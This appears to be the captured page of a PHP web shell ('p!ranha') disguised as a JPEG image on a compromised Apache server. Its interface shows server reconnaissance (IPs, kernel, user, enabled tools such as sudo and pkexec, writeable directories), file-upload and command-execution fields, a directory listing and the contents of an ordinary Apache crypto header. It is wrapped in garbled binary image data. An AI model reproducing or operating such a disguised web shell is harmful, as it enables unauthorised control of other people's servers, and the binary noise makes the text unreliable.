JFIFHHC     C  " 5????! ??? JFIF    >CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality C     p!ranha?
Server IP : 104.21.46.92  /  Your IP : 104.23.197.222
Web Server : Apache/2.4.51 (Unix) OpenSSL/1.1.1n
System : Linux ip-172-26-8-243 4.19.0-27-cloud-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : daemon ( 1)
PHP Version : 7.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/bitnami/apache/include/apr-1/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /opt/bitnami/apache/include/apr-1/apr_crypto.h
/* Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#ifndef APR_CRYPTO_H
#define APR_CRYPTO_H

#include "apu.h"
#include "apr_pools.h"
#include "apr_tables.h"
#include "apr_hash.h"
#include "apu_errno.h"

#ifdef __cplusplus
extern "C" {
#endif

/**
 * @file apr_crypto.h
 * @brief APR-UTIL Crypto library
 */
/**
 * @defgroup APR_Util_Crypto Crypto routines
 * @ingroup APR_Util
 * @{
 */

#if APU_HAVE_CRYPTO

#ifndef APU_CRYPTO_RECOMMENDED_DRIVER
#if APU_HAVE_COMMONCRYPTO
#define APU_CRYPTO_RECOMMENDED_DRIVER "commoncrypto"
#else
#if APU_HAVE_OPENSSL
#define APU_CRYPTO_RECOMMENDED_DRIVER "openssl"
#else
#if APU_HAVE_NSS
#define APU_CRYPTO_RECOMMENDED_DRIVER "nss"
#else
#if APU_HAVE_MSCNG
#define APU_CRYPTO_RECOMMENDED_DRIVER "mscng"
#else
#if APU_HAVE_MSCAPI
#define APU_CRYPTO_RECOMMENDED_DRIVER "mscapi"
#else
#endif
#endif
#endif
#endif
#endif
#endif

/**
 * Symmetric Key types understood by the library.
 *
 * NOTE: It is expected that this list will grow over time.
 *
 * Interoperability Matrix:
 *
 * The matrix is based on the testcrypto.c unit test, which attempts to
 * test whether a simple encrypt/decrypt will succeed, as well as testing
 * whether an encrypted string by one library can be decrypted by the
 * others.
 *
 * Some libraries will successfully encrypt and decrypt their own data,
 * but won't decrypt data from another library. It is hoped that over
 * time these anomalies will be found and fixed, but until then it is
 * recommended that ciphers are chosen that interoperate across platform.
 *
 * An X below means the test passes, it does not necessarily mean that
 * encryption performed is correct or secure. Applications should stick
 * to ciphers that pass the interoperablity tests on the right hand side
 * of the table.
 *
 * Aligned data is data whose length is a multiple of the block size for
 * the chosen cipher. Padded data is data that is not aligned by block
 * size and must be padded by the crypto library.
 *
 *                  OpenSSL    CommonCrypto   NSS       Interop
 *                 Align  Pad  Align  Pad  Align  Pad  Align  Pad
 * 3DES_192/CBC    X      X    X      X    X      X    X      X
 * 3DES_192/ECB    X      X    X      X
 * AES_256/CBC     X      X    X      X    X      X    X      X
 * AES_256/ECB     X      X    X      X    X           X
 * AES_192/CBC     X      X    X      X    X      X
 * AES_192/ECB     X      X    X      X    X
 * AES_128/CBC     X      X    X      X    X      X
 * AES_128/ECB     X      X    X      X    X
 *
 * Conclusion: for padded data, use 3DES_192/CBC or AES_256/CBC. For
 * aligned data, use 3DES_192/CBC, AES_256/CBC or AES_256/ECB.
 */

typedef enum
{
    APR_KEY_NONE, APR_KEY_3DES_192, /** 192 bit (3-Key) 3DES */
    APR_KEY_AES_128, /** 128 bit AES */
    APR_KEY_AES_192, /** 192 bit AES */
    APR_KEY_AES_256
/** 256 bit AES */
} apr_crypto_block_key_type_e;

typedef enum
{
    APR_MODE_NONE, /** An error condition */
    APR_MODE_ECB, /** Electronic Code Book */
    APR_MODE_CBC
/** Cipher Block Chaining */
} apr_crypto_block_key_mode_e;

/* These are opaque structs.  Instantiation is up to each backend */
typedef struct apr_crypto_driver_t apr_crypto_driver_t;
typedef struct apr_crypto_t apr_crypto_t;
typedef struct apr_crypto_config_t apr_crypto_config_t;
typedef struct apr_crypto_key_t apr_crypto_key_t;
typedef struct apr_crypto_block_t apr_crypto_block_t;

typedef struct apr_crypto_block_key_type_t {
    apr_crypto_block_key_type_e type;
    int keysize;
    int blocksize;
    int ivsize;
} apr_crypto_block_key_type_t;

typedef struct apr_crypto_block_key_mode_t {
    apr_crypto_block_key_mode_e mode;
} apr_crypto_block_key_mode_t;

typedef struct apr_crypto_passphrase_t {
    const char *pass;
    apr_size_t passLen;
    const unsigned char * salt;
    apr_size_t saltLen;
    int iterations;
} apr_crypto_passphrase_t;

typedef struct apr_crypto_secret_t {
    const unsigned char *secret;
    apr_size_t secretLen;
} apr_crypto_secret_t;

typedef enum {
    /** Key is derived from a passphrase */
    APR_CRYPTO_KTYPE_PASSPHRASE     = 1,
    /** Key is derived from a raw key */
    APR_CRYPTO_KTYPE_SECRET     = 2,
} apr_crypto_key_type;

typedef struct apr_crypto_key_rec_t {
    apr_crypto_key_type ktype;
    apr_crypto_block_key_type_e type;
    apr_crypto_block_key_mode_e mode;
    int pad;
    union {
        apr_crypto_passphrase_t passphrase;
        apr_crypto_secret_t secret;
    } k;
} apr_crypto_key_rec_t;

/**
 * @brief Perform once-only initialisation. Call once only.
 *
 * @param pool - pool to register any shutdown cleanups, etc
 * @return APR_NOTIMPL in case of no crypto support.
 */
APU_DECLARE(apr_status_t) apr_crypto_init(apr_pool_t *pool);

/**
 * @brief Zero out the buffer provided when the pool is cleaned up.
 *
 * @param pool - pool to register the cleanup
 * @param buffer - buffer to zero out
 * @param size - size of the buffer to zero out
 */
APU_DECLARE(apr_status_t) apr_crypto_clear(apr_pool_t *pool, void *buffer,
        apr_size_t size);

/**
 * @brief Always zero out the buffer provided, without being optimized out by
 * the compiler.
 *
 * @param buffer - buffer to zero out
 * @param size - size of the buffer to zero out
 */
APU_DECLARE(apr_status_t) apr_crypto_memzero(void *buffer, apr_size_t size);

/**
 * @brief Timing attacks safe buffers comparison, where the executing time does
 * not depend on the bytes compared but solely on the number of bytes.
 *
 * @param buf1 - first buffer to compare
 * @param buf2 - second buffer to compare
 * @param size - size of the buffers to compare
 * @return 1 if the buffers are equals, 0 otherwise.
 */
APU_DECLARE(int) apr_crypto_equals(const void *buf1, const void *buf2,
                                   apr_size_t size);

/**
 * @brief Get the driver struct for a name
 *
 * @param driver - pointer to driver struct.
 * @param name - driver name
 * @param params - array of initialisation parameters
 * @param result - result and error message on failure
 * @param pool - (process) pool to register cleanup
 * @return APR_SUCCESS for success
 * @return APR_ENOTIMPL for no driver (when DSO not enabled)
 * @return APR_EDSOOPEN if DSO driver file can't be opened
 * @return APR_ESYMNOTFOUND if the driver file doesn't contain a driver
 * @remarks NSS: the params can have "dir", "key3", "cert7" and "secmod"
 *  keys, each followed by an equal sign and a value. Such key/value pairs can
 *  be delimited by space or tab. If the value contains a space, surround the
 *  whole key value pair in quotes: "dir=My Directory".
 * @remarks OpenSSL: currently no params are supported.
 */
APU_DECLARE(apr_status_t) apr_crypto_get_driver(
        const apr_crypto_driver_t **driver,
        const char *name, const char *params, const apu_err_t **result,
        apr_pool_t *pool);

/**
 * @brief Return the name of the driver.
 *
 * @param driver - The driver in use.
 * @return The name of the driver.
 */
APU_DECLARE(const char *) apr_crypto_driver_name(
        const apr_crypto_driver_t *driver);

/**
 * @brief Get the result of the last operation on a context. If the result
 *        is NULL, the operation was successful.
 * @param result - the result structure
 * @param f - context pointer
 * @return APR_SUCCESS for success
 */
APU_DECLARE(apr_status_t) apr_crypto_error(const apu_err_t **result,
        const apr_crypto_t *f);

/**
 * @brief Create a context for supporting encryption. Keys, certificates,
 *        algorithms and other parameters will be set per context. More than
 *        one context can be created at one time. A cleanup will be automatically
 *        registered with the given pool to guarantee a graceful shutdown.
 * @param f - context pointer will be written here
 * @param driver - driver to use
 * @param params - array of key parameters
 * @param pool - process pool
 * @return APR_ENOENGINE when the engine specified does not exist. APR_EINITENGINE
 * if the engine cannot be initialised.
 * @remarks NSS: currently no params are supported.
 * @remarks OpenSSL: the params can have "engine" as a key, followed by an equal
 *  sign and a value.
 */
APU_DECLARE(apr_status_t) apr_crypto_make(apr_crypto_t **f,
        const apr_crypto_driver_t *driver, const char *params,
        apr_pool_t *pool);

/**
 * @brief Get a hash table of key types, keyed by the name of the type against
 * a pointer to apr_crypto_block_key_type_t, which in turn begins with an
 * integer.
 *
 * @param types - hashtable of key types keyed to constants.
 * @param f - encryption context
 * @return APR_SUCCESS for success
 */
APU_DECLARE(apr_status_t) apr_crypto_get_block_key_types(apr_hash_t **types,
        const apr_crypto_t *f);

/**
 * @brief Get a hash table of key modes, keyed by the name of the mode against
 * a pointer to apr_crypto_block_key_mode_t, which in turn begins with an
 * integer.
 *
 * @param modes - hashtable of key modes keyed to constants.
 * @param f - encryption context
 * @return APR_SUCCESS for success
 */
APU_DECLARE(apr_status_t) apr_crypto_get_block_key_modes(apr_hash_t **modes,
        const apr_crypto_t *f);

/**
 * @brief Create a key from the provided secret or passphrase. The key is cleaned
 *        up when the context is cleaned, and may be reused with multiple encryption
 *        or decryption operations.
 * @note If *key is NULL, a apr_crypto_key_t will be created from a pool. If
 *       *key is not NULL, *key must point at a previously created structure.
 * @param key The key returned, see note.
 * @param rec The key record, from which the key will be derived.
 * @param f The context to use.
 * @param p The pool to use.
 * @return Returns APR_ENOKEY if the pass phrase is missing or empty, or if a backend
 *         error occurred while generating the key. APR_ENOCIPHER if the type or mode
 *         is not supported by the particular backend. APR_EKEYTYPE if the key type is
 *         not known. APR_EPADDING if padding was requested but is not supported.
 *         APR_ENOTIMPL if not implemented.
 */
APU_DECLARE(apr_status_t) apr_crypto_key(apr_crypto_key_t **key,
        const apr_crypto_key_rec_t *rec, const apr_crypto_t *f, apr_pool_t *p);

/**
 * @brief Create a key from the given passphrase. By default, the PBKDF2
 *        algorithm is used to generate the key from the passphrase. It is expected
 *        that the same pass phrase will generate the same key, regardless of the
 *        backend crypto platform used. The key is cleaned up when the context
 *        is cleaned, and may be reused with multiple encryption or decryption
 *        operations.
 * @note If *key is NULL, a apr_crypto_key_t will be created from a pool. If
 *       *key is not NULL, *key must point at a previously created structure.
 * @param key The key returned, see note.
 * @param ivSize The size of the initialisation vector will be returned, based
 *               on whether an IV is relevant for this type of crypto.
 * @param pass The passphrase to use.
 * @param passLen The passphrase length in bytes
 * @param salt The salt to use.
 * @param saltLen The salt length in bytes
 * @param type 3DES_192, AES_128, AES_192, AES_256.
 * @param mode Electronic Code Book / Cipher Block Chaining.
 * @param doPad Pad if necessary.
 * @param iterations Number of iterations to use in algorithm
 * @param f The context to use.
 * @param p The pool to use.
 * @return Returns APR_ENOKEY if the pass phrase is missing or empty, or if a backend
 *         error occurred while generating the key. APR_ENOCIPHER if the type or mode
 *         is not supported by the particular backend. APR_EKEYTYPE if the key type is
 *         not known. APR_EPADDING if padding was requested but is not supported.
 *         APR_ENOTIMPL if not implemented.
 * @deprecated Replaced by apr_crypto_key().
 */
APU_DECLARE(apr_status_t) apr_crypto_passphrase(apr_crypto_key_t **key,
        apr_size_t *ivSize, const char *pass, apr_size_t passLen,
        const unsigned char * salt, apr_size_t saltLen,
        const apr_crypto_block_key_type_e type,
        const apr_crypto_block_key_mode_e mode, const int doPad,
        const int iterations, const apr_crypto_t *f, apr_pool_t *p);

/**
 * @brief Initialise a context for encrypting arbitrary data using the given key.
 * @note If *ctx is NULL, a apr_crypto_block_t will be created from a pool. If
 *       *ctx is not NULL, *ctx must point at a previously created structure.
 * @param ctx The block context returned, see note.
 * @param iv Optional initialisation vector. If the buffer pointed to is NULL,
 *           an IV will be created at random, in space allocated from the pool.
 *           If the buffer pointed to is not NULL, the IV in the buffer will be
 *           used.
 * @param key The key structure to use.
 * @param blockSize The block size of the cipher.
 * @param p The pool to use.
 * @return Returns APR_ENOIV if an initialisation vector is required but not specified.
 *         Returns APR_EINIT if the backend failed to initialise the context. Returns
 *         APR_ENOTIMPL if not implemented.
 */
APU_DECLARE(apr_status_t) apr_crypto_block_encrypt_init(
        apr_crypto_block_t **ctx, const unsigned char **iv,
        const apr_crypto_key_t *key, apr_size_t *blockSize, apr_pool_t *p);

/**
 * @brief Encrypt data provided by in, write it to out.
 * @note The number of bytes written will be written to outlen. If
 *       out is NULL, outlen will contain the maximum size of the
 *       buffer needed to hold the data, including any data
 *       generated by apr_crypto_block_encrypt_finish below. If *out points
 *       to NULL, a buffer sufficiently large will be created from
 *       the pool provided. If *out points to a not-NULL value, this
 *       value will be used as a buffer instead.
 * @param out Address of a buffer to which data will be written,
 *        see note.
 * @param outlen Length of the output will be written here.
 * @param in Address of the buffer to read.
 * @param inlen Length of the buffer to read.
 * @param ctx The block context to use.
 * @return APR_ECRYPT if an error occurred. Returns APR_ENOTIMPL if
 *         not implemented.
 */
APU_DECLARE(apr_status_t) apr_crypto_block_encrypt(unsigned char **out,
        apr_size_t *outlen, const unsigned char *in, apr_size_t inlen,
        apr_crypto_block_t *ctx);

/**
 * @brief Encrypt final data block, write it to out.
 * @note If necessary the final block will be written out after being
 *       padded. Typically the final block will be written to the
 *       same buffer used by apr_crypto_block_encrypt, offset by the
 *       number of bytes returned as actually written by the
 *       apr_crypto_block_encrypt() call. After this call, the context
 *       is cleaned and can be reused by apr_crypto_block_encrypt_init().
 * @param out Address of a buffer to which data will be written. This
 *            buffer must already exist, and is usually the same
 *            buffer used by apr_evp_crypt(). See note.
 * @param outlen Length of the output will be written here.
 * @param ctx The block context to use.
 * @return APR_ECRYPT if an error occurred.
 * @return APR_EPADDING if padding was enabled and the block was incorrectly
 *         formatted.
 * @return APR_ENOTIMPL if not implemented.
 */
APU_DECLARE(apr_status_t) apr_crypto_block_encrypt_finish(unsigned char *out,
        apr_size_t *outlen, apr_crypto_block_t *ctx);

/**
 * @brief Initialise a context for decrypting arbitrary data using the given key.
 * @note If *ctx is NULL, a apr_crypto_block_t will be created from a pool. If
 *       *ctx is not NULL, *ctx must point at a previously created structure.
 * @param ctx The block context returned, see note.
 * @param blockSize The block size of the cipher.
 * @param iv Optional initialisation vector.
 * @param key The key structure to use.
 * @param p The pool to use.
 * @return Returns APR_ENOIV if an initialisation vector is required but not specified.
 *         Returns APR_EINIT if the backend failed to initialise the context. Returns
 *         APR_ENOTIMPL if not implemented.
 */
APU_DECLARE(apr_status_t) apr_crypto_block_decrypt_init(
        apr_crypto_block_t **ctx, apr_size_t *blockSize,
        const unsigned char *iv, const apr_crypto_key_t *key, apr_pool_t *p);

/**
 * @brief Decrypt data provided by in, write it to out.
 * @note The number of bytes written will be written to outlen. If
 *       out is NULL, outlen will contain the maximum size of the
 *       buffer needed to hold the data, including any data
 *       generated by apr_crypto_block_decrypt_finish below. If *out points
 *       to NULL, a buffer sufficiently large will be created from
 *       the pool provided. If *out points to a not-NULL value, this
 *       value will be used as a buffer instead.
 * @param out Address of a buffer to which data will be written,
 *        see note.
 * @param outlen Length of the output will be written here.
 * @param in Address of the buffer to read.
 * @param inlen Length of the buffer to read.
 * @param ctx The block context to use.
 * @return APR_ECRYPT if an error occurred. Returns APR_ENOTIMPL if
 *         not implemented.
 */
APU_DECLARE(apr_status_t) apr_crypto_block_decrypt(unsigned char **out,
        apr_size_t *outlen, const unsigned char *in, apr_size_t inlen,
        apr_crypto_block_t *ctx);

/**
 * @brief Decrypt final data block, write it to out.
 * @note If necessary the final block will be written out after being
 *       padded. Typically the final block will be written to the
 *       same buffer used by apr_crypto_block_decrypt, offset by the
 *       number of bytes returned as actually written by the
 *       apr_crypto_block_decrypt() call. After this call, the context
 *       is cleaned and can be reused by apr_crypto_block_decrypt_init().
 * @param out Address of a buffer to which data will be written. This
 *            buffer must already exist, and is usually the same
 *            buffer used by apr_evp_crypt(). See note.
 * @param outlen Length of the output will be written here.
 * @param ctx The block context to use.
 * @return APR_ECRYPT if an error occurred.
 * @return APR_EPADDING if padding was enabled and the block was incorrectly
 *         formatted.
 * @return APR_ENOTIMPL if not implemented.
 */
APU_DECLARE(apr_status_t) apr_crypto_block_decrypt_finish(unsigned char *out,
        apr_size_t *outlen, apr_crypto_block_t *ctx);

/**
 * @brief Clean encryption / decryption context.
 * @note After cleanup, a context is free to be reused if necessary.
 * @param ctx The block context to use.
 * @return Returns APR_ENOTIMPL if not supported.
 */
APU_DECLARE(apr_status_t) apr_crypto_block_cleanup(apr_crypto_block_t *ctx);

/**
 * @brief Clean encryption / decryption context.
 * @note After cleanup, a context is free to be reused if necessary.
 * @param f The context to use.
 * @return Returns APR_ENOTIMPL if not supported.
 */
APU_DECLARE(apr_status_t) apr_crypto_cleanup(apr_crypto_t *f);

/**
 * @brief Shutdown the crypto library.
 * @note After shutdown, it is expected that the init function can be called again.
 * @param driver - driver to use
 * @return Returns APR_ENOTIMPL if not supported.
 */
APU_DECLARE(apr_status_t) apr_crypto_shutdown(
        const apr_crypto_driver_t *driver);

#endif /* APU_HAVE_CRYPTO */

/** @} */

#ifdef __cplusplus
}
#endif

#endif
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
October 07 2021 18:50:07
root / root
0755
apr.h
17.539 KB
October 07 2021 18:37:39
root / root
0644
apr_allocator.h
6.071 KB
October 07 2021 18:37:39
root / root
0644
apr_anylock.h
4.932 KB
October 07 2021 18:37:45
root / root
0644
apr_atomic.h
6.043 KB
October 07 2021 18:37:39
root / root
0644
apr_base64.h
3.754 KB
October 07 2021 18:37:45
root / root
0644
apr_buckets.h
63.041 KB
October 07 2021 18:37:45
root / root
0644
apr_crypto.h
19.685 KB
October 07 2021 18:37:45
root / root
0644
apr_cstr.h
11.131 KB
October 07 2021 18:37:39
root / root
0644
apr_date.h
3.471 KB
October 07 2021 18:37:45
root / root
0644
apr_dbd.h
23.349 KB
October 07 2021 18:37:45
root / root
0644
apr_dbm.h
8.397 KB
October 07 2021 18:37:45
root / root
0644
apr_dso.h
2.637 KB
October 07 2021 18:37:39
root / root
0644
apr_encode.h
23.969 KB
October 07 2021 18:37:39
root / root
0644
apr_env.h
2.056 KB
October 07 2021 18:37:39
root / root
0644
apr_errno.h
53.771 KB
October 07 2021 18:37:39
root / root
0644
apr_escape.h
17.232 KB
October 07 2021 18:37:39
root / root
0644
apr_file_info.h
17.172 KB
October 07 2021 18:37:39
root / root
0644
apr_file_io.h
42.126 KB
October 07 2021 18:37:39
root / root
0644
apr_fnmatch.h
6.083 KB
October 07 2021 18:37:39
root / root
0644
apr_general.h
7.123 KB
October 07 2021 18:37:39
root / root
0644
apr_getopt.h
5.84 KB
October 07 2021 18:37:39
root / root
0644
apr_global_mutex.h
7.188 KB
October 07 2021 18:37:39
root / root
0644
apr_hash.h
10.084 KB
October 07 2021 18:37:39
root / root
0644
apr_hooks.h
12.363 KB
October 07 2021 18:37:45
root / root
0644
apr_inherit.h
2.089 KB
October 07 2021 18:37:39
root / root
0644
apr_ldap.h
5.57 KB
October 07 2021 18:37:45
root / root
0644
apr_ldap_init.h
5.645 KB
October 07 2021 18:37:45
root / root
0644
apr_ldap_option.h
8.402 KB
October 07 2021 18:37:45
root / root
0644
apr_ldap_rebind.h
3.094 KB
October 07 2021 18:37:45
root / root
0644
apr_ldap_url.h
3.71 KB
October 07 2021 18:37:45
root / root
0644
apr_lib.h
8.232 KB
October 07 2021 18:37:39
root / root
0644
apr_md4.h
4.419 KB
October 07 2021 18:37:45
root / root
0644
apr_md5.h
6.201 KB
October 07 2021 18:37:45
root / root
0644
apr_memcache.h
16.82 KB
October 07 2021 18:37:45
root / root
0644
apr_mmap.h
5.013 KB
October 07 2021 18:37:39
root / root
0644
apr_network_io.h
36.009 KB
October 07 2021 18:37:39
root / root
0644
apr_optional.h
2.715 KB
October 07 2021 18:37:45
root / root
0644
apr_optional_hooks.h
3.781 KB
October 07 2021 18:37:45
root / root
0644
apr_perms_set.h
1.864 KB
October 07 2021 18:37:39
root / root
0644
apr_poll.h
20.604 KB
October 07 2021 18:37:39
root / root
0644
apr_pools.h
30.938 KB
October 07 2021 18:37:39
root / root
0644
apr_portable.h
20.022 KB
October 07 2021 18:37:39
root / root
0644
apr_proc_mutex.h
6.848 KB
October 07 2021 18:37:39
root / root
0644
apr_queue.h
3.984 KB
October 07 2021 18:37:45
root / root
0644
apr_random.h
4.918 KB
October 07 2021 18:37:39
root / root
0644
apr_redis.h
15.62 KB
October 07 2021 18:37:45
root / root
0644
apr_reslist.h
7.008 KB
October 07 2021 18:37:45
root / root
0644
apr_ring.h
18.569 KB
October 07 2021 18:37:39
root / root
0644
apr_rmm.h
4.666 KB
October 07 2021 18:37:45
root / root
0644
apr_sdbm.h
5.97 KB
October 07 2021 18:37:45
root / root
0644
apr_sha1.h
3.793 KB
October 07 2021 18:37:45
root / root
0644
apr_shm.h
9.261 KB
October 07 2021 18:37:39
root / root
0644
apr_signal.h
2.696 KB
October 07 2021 18:37:39
root / root
0644
apr_siphash.h
6.014 KB
October 07 2021 18:37:45
root / root
0644
apr_skiplist.h
14.192 KB
October 07 2021 18:37:39
root / root
0644
apr_strings.h
14.548 KB
October 07 2021 18:37:39
root / root
0644
apr_strmatch.h
2.614 KB
October 07 2021 18:37:45
root / root
0644
apr_support.h
1.596 KB
October 07 2021 18:37:39
root / root
0644
apr_tables.h
18.899 KB
October 07 2021 18:37:39
root / root
0644
apr_thread_cond.h
5.396 KB
October 07 2021 18:37:39
root / root
0644
apr_thread_mutex.h
4.393 KB
October 07 2021 18:37:39
root / root
0644
apr_thread_pool.h
10.844 KB
October 07 2021 18:37:45
root / root
0644
apr_thread_proc.h
35.28 KB
October 07 2021 18:37:39
root / root
0644
apr_thread_rwlock.h
4.654 KB
October 07 2021 18:37:39
root / root
0644
apr_time.h
7.386 KB
October 07 2021 18:37:39
root / root
0644
apr_uri.h
6.435 KB
October 07 2021 18:37:45
root / root
0644
apr_user.h
5.186 KB
October 07 2021 18:37:39
root / root
0644
apr_uuid.h
2.053 KB
October 07 2021 18:37:45
root / root
0644
apr_version.h
5.284 KB
October 07 2021 18:37:39
root / root
0644
apr_want.h
2.889 KB
October 07 2021 18:37:39
root / root
0644
apr_xlate.h
6.258 KB
October 07 2021 18:37:45
root / root
0644
apr_xml.h
12.193 KB
October 07 2021 18:37:45
root / root
0644
apu.h
4.217 KB
October 07 2021 18:37:45
root / root
0644
apu_errno.h
5.316 KB
October 07 2021 18:37:45
root / root
0644
apu_version.h
4.198 KB
October 07 2021 18:37:45
root / root
0644
apu_want.h
1.448 KB
October 07 2021 18:37:45
root / root
0644
 $.' ",#(7),01444'9=82<.342 C  2!!22222222222222222222222222222222222222222222222222  }|"        } !1AQa "q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz& !0`""a        w !1AQ aq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz& !0`""a   ? HRjA <̒.9;r8 Sc*#k0a0 ZY 7/$ #'Ri'H/]< q_LW9c#5AG5#T8N38UJ1z]k{}ߩ)me&/lcBa8l S7(S `AI&L@3v, y cF0-Juh!{~?"=nqo~$ѻj]M >[?) ms~=*{7E5);6!,  0G K >a9$m$ds*+ Cc r{ ogf X~2v 8SВ~W5S*&atnݮ:%J{h[K }y~b6F8 9 1;ϡa{{u/[nJi- f=Ȯ8O!c H%N@<}qlu"a&xHm<*7"& #!|Ӧqfx"oN{F;`!q9vRqR?~8p)ܵRJ Q @Xy{*ORs~QaRqE65I 5+0y FKj}uwkϮj+z{kgx5(fnrFG8QjVVF)2 `vGLsVI,ݣa(`:L0e V+2h hs`iVS4SaۯsJ-밳Mw$Qd d }}Ʒ7"asA:rR.v@ jY%`5\ܲ2H׭*d_(ܻ#'X 0r1R>"2~9Ҳ}:XgVI?*!-N=3sϿ*{":4ahKG9G{M]+]˸ `mcϱy=y:)T&J>d$nz2 sn`ܫS;y }=px`M=i* ޲ 1}=qxj Qy`A,2ScR;wfT#`~ jaR59HVyA99?aQ vNq!C=:a#m#bY /(SRt Q~ Cɶ~ VB ~2ONOZrA Af^3\t_-ϦnJ[/|2#[!,O|sV/|IS$cFwt+zTayLPZ>#a ^r7d\u "3 83&DT S@rOW PSܣ[0};NRWk "VHl>Zܠnw :q׷el,44`;/I'pxaS";vixUuY1#:}T[{Kwi ma99 c#23ɫx-3iiW"~- yY"8|c-< S#30qmI"d cqf  #5PXW ty?ysvYUB(01 JǦ5%u'ewͮ{maܳ0!B0A~z{a{kc B ` ==}r Wh{xK% s9U@p7c}1WR^yY\ brp8'sֺk'K}"+l44?0I"ڳ.0d)@fPq׬F~ZY 3"BAF$SN  @(a lbW\vxNjZIF`6 ?! Nxҩҭ OxM{jqR 0 &yL%?y$"\p4:&u$aC$xo>TK@'y{~4KcC v}&y?]Ol|_; ϡRn r[mܡ}4D}:) $XxaY8i" !pJ"V^0 Rien% 8eeY,S =?E k"bi0ʶI=O:Sk>hKON9K2uPf*ny41l~}I~*E FSj%RP7U0Ul(D2z>a}X ƭ,~C<B6 2| HC#%:a7"Sa'ysK4!0R{szR5HC+=}ygn0c|SOA9kԮ}f"R#copIC~é :^eef # <3ֻxשƤ"ӽ94'_LOF90 &ܧܭS0R0#o8#R6y}73G^2~ox:##Sr=k41 r  zo 7"_=`0ld` qt+9?x%m,{.j;%h*:U}qfp}  g$*{XLI:"fB\BUzrRr#Ь +(Px:$SR~tk9ab! S#G'oUSGv4v} Sb{{)PҺ#Bܬ86GˏdTmV$gi&'r:1SSҠ" rP*I[N9_["#Kr.F*I?ts Thյ % =ଣa$|E"~GG O#,yϩ&~\\c1L2HQR :}9!`͐ɾF''yNp|=~D""vn2s~GL IUPUw-/mme] ? aZeki,q0c10PTpAg%zS߰2ĤU]`~I;px?_Z|^agD )~J0E]##o"NO09>"Sưpc`I}˯ JG~ +dcQj's&v6}ib %\r9gxuMg~x}0?*Wa^O*#  1wssRpTpU(u}`Ref  9bݿ 1FS999)e cs{'uOSܺ0fee6~yoƧ9"%f80(OOj&E T&%rKz?.;{aX!xeUd!x9t%wO_ocM- jHX_iK#*) ~@}{ ǽBd0Rn07 y@̢ 9?S ޫ>u'ʴu\"uW5֒HYtL B}GLZTg ܰ fb69\PP 緶;!3Ln]H8:@ S}>oޢ5%k:N ",xfpHbRL0 ~} e pF0'}=T0"!&zt9?F&yR`I #}J'76w`:q*2::ñޤ<  | 'F^q`gkqyxL; Rx?!Y7P}wn ·.KUٿGr4+ %EK/ uvzTp{{wEyvi 0X :}OS'aHKq*mF@\N:t^*sn }29T.\ @>7NFNRӷwEua'[c̐O`. Ps) gu5DUR;aF$`[CFZHUB M<9SRUFwv&#s$fLg8Q$q9Jez`R[' ?zﶥu3(MSs}0@9$&-ߦO"g`+n'k/ !$-1)ae2`g۰Z#r 9|ը}Iѭǻ1Bc.qR u`^սSmk}uzmSi<6{m}VUv3 SqRSԶ9{" bg@R Tqinl!1`+xq~:f ihjz&w"RI'9nSvmUۍ"I-_kK{ivimQ|o-~}j:`|ܨ qRR~yw@q%彶imoj0hF;8,:yuO'|;ڦR%:tF~ Ojߩa)ZVjkHf&#a'R\"Il`9dL9t"Ĭ7}:v /1`!n9!$ RqzRsF[In%f"R~ps9rzaRq6ۦ=0i+?HVRheIr:7f 8<+~[֬]poV%v pzg639{Rr81^{qo 92|ܬ}r=;zC*|+[zۣaS&쭬&C[ȼ3`RL9{j?KaWZVm6E}{X~? z~8ˢ 39~}~u-"cm9s kx]:[[yhw"BN v$ y9@" v[Ƽ* zSd~xvLTT"7j +tCP5:= /"ig#7ki' x9#}}ano!KDl('S?c_;`Ū3 9oW9g!Zk:p6[Uwxnq}qqFesS[;tj~]<:~!x,}V&"AP?&vIF8~SR̬`*:qxA-La-"i g|*px F:n~˯޼BRQC`5*]Q >:*D(cX( FL0`;5R|G#3`0+mѬn ޣ &0❬0 S&{t?ʯ(__`5XY[|Q `2:sO* <+:Mka&ij ƫ?Scun]I: 砯[&xn;6>}'`I0N}z5r\0s^Ml%M$F"jZek 2"Fq`~5+ҤQ G9 q=cᶡ/Ƥ[ iK """p;`tMt}+@dy3mՏzc0 yq~ 45[_]R{]UZp^[& Osz~I btΪ\yaU;Ct*IFF3`"c 1~YD&U \oRa !c[[G}P7 zn>3,=lUENR[_9 SJMyE}x,bpAdcRW9?[H$p"#^9O88zO=!Yy91 ڻM?M#C&nJp#~ G ekϵo_~xuΨQt۲:W6oyFQr $k9ڼs67\myFTK;[ld7ya` eY~q[&vMF}p3gW!8Vn:a/ ,i|R,`!W}1Ӿx~x XZG\vR~sӭ&{]Q~9ʡH~"5 -&U+g j~륢N=Jfd 9BfI nZ8wЮ~a=3x+/l`?"#8-S\pqTZXt%&#` ~{p{m>ycP0(R^} (y%m}kB1Ѯ,#Q)!o1T*}9y< b04H. 9`>}ga `~)\oBRaLSg$IZ~%8)Rcu9b%)S 4ֺ}Z/[H%v#x b t{gn=i%]ܧ! wSp V?5cb_`znxKJ=WT9qx"qzWUNN/O^xe|k{4V^~Gz|[31 rpjgn 0}k90ne+"VbrO]'0oxh`*!T$d/$~N>Wq&Z9O\1o&,-z ~^NCgN)ʩ70'_Eh u*K9.-v<h$W%~g-G~>ZIa+(aM #9l%c  xKGx|"O:8qcyNJyRTj&Omztj ?KaXLebt~A`GBA":g,h`q` 